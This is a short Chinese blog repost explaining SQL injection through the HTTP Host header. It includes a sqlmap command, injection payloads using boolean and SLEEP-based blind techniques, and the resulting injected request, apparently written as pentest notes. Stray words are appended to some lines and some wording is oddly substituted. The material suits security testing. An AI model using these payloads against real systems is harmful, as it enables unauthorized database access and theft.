对 HTTP 请求的 Host 参数进行 SQL 注入

时间  2019-12-07
标签 http 请求 host 参数 进行 sql 注入 栏目 HTTP/TCP 繁體版
原文   原文链接

最近收到了一个漏洞通报,竟然是对 HTTP 请求的 Host 参数进行 SQL 注入,比较有趣,须要总结一下。mysql

以下是通过简化的具体的渗透测试命令,假设主机名为 aaa.bbb.ccc:sql

$ more sql.txt   
GET / HTTP/1.1
Host: aaa.bbb.ccc*

$ sqlmap --host http://aaa.bbb.ccc -r sql.txt --random-agent -p Host --risk 3 --dbms mysql  --current-user --is-dba —tables
...
sqlmap identified the following injection point(s) with a total of 306 HTTP(s) requests:
---
Parameter: Host #1* ((custom) HEADER)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause
    Payload: -6117') OR 9754=9754 AND ('EXWO'='EXWO

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 OR time-based blind
    Payload: aaa.bbb.ccc') OR SLEEP(5) AND ('UnAw'='UnAw
---
...

渗透过程当中 sqlmap 会生成相似以下的 HTTP 请求,以进行 SQL 注入测试,经过 -v3 参数能够看到:dom

GET / HTTP/1.1
Host: aaa.bbb.ccc') OR SLEEP(5) AND ('hxje'='hxje
Referer: http://aaa.bbb.ccc:80/
User-agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.8) Gecko/20071022 Firefox/2.0.0.8
Connection: close

正常状况下,使用 --level 3 参数时 sqlmap 会测试一些 HTTP 请求头的参数,但不会测试 Host 参数,因此须要使用 -p Host 参数来指定测试。ide

此外因为 Host 参数与伪静态页面相似,因此还须要用 * 星号标记一下注入点。测试

相关文章
相关标签/搜索
每日一句
    每一个你不满意的现在,都有一个你没有努力的曾经。
本站公众号
   欢迎关注本站公众号,获取更多信息
联系我们 最近搜索 最新文章 沪ICP备13005482号-10 MyBatis教程 SQL 教程 MySQL教程 Java 教程 Thymeleaf 教程 Hibernate教程 Spring教程 Redis教程